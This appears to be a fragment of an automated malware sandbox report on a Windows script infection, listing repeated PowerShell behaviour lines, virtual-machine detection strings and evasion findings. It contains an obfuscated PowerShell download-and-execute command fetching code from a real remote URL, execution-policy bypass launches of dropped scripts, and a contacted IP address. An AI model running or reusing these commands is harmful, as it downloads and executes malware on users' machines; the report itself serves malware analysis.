Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4307Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5538Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3759Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6026Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 3759 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 6026 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 596Thread sleep count: 33 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 596Thread sleep time: -30437127721620741s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000002.1409358393.00000280F5891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: wscript.exe, 00000000.00000002.1408812843.00000280F3913000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F3913000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3913000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F3913000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1655916338.0000018DEE2F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.166.143.49 443Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -wind hidden -exec bypass -noni sleep 2;[byte[]];$g45e='iex(new-object net.w';$df54='ebclient).downlo';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.replace('zalooma','adstring');sleep 1;iex($g45e+$df54+$5s4d);
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -wind hidden -exec bypass -noni sleep 2;[byte[]];$g45e='iex(new-object net.w';$df54='ebclient).downlo';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.replace('zalooma','adstring');sleep 1;iex($g45e+$df54+$5s4d);Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
